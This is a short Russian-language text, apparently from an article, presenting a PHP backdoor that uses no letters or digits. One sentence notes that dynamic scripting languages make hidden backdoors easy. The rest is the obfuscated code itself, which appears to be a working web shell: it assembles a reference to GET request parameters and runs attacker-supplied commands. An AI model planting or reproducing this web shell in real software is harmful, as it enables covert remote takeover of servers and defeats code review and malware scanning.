Бэкдор без единого буквенно-цифрового символа
Как видим, динамические скриптовые языки программирования (с динамической типизацией и более гибкими операциями над структурами, например PHP, Python, Perl, JavaScript) имеют куда больше возможностей для скрытия программных закладок, в частности бэкдоров, реализующих шеллкод, удаленное выполнение команд, через GET-запросы.
Вот так выглядит обфусцированный код данного бэкдора, ни одного буквенно-цифрового символа! :
<?php @$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_; $_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]); $_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]); $_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__]; $_=$ $_[$__+$__];$_[@-_]($_[@!+_]); ?>
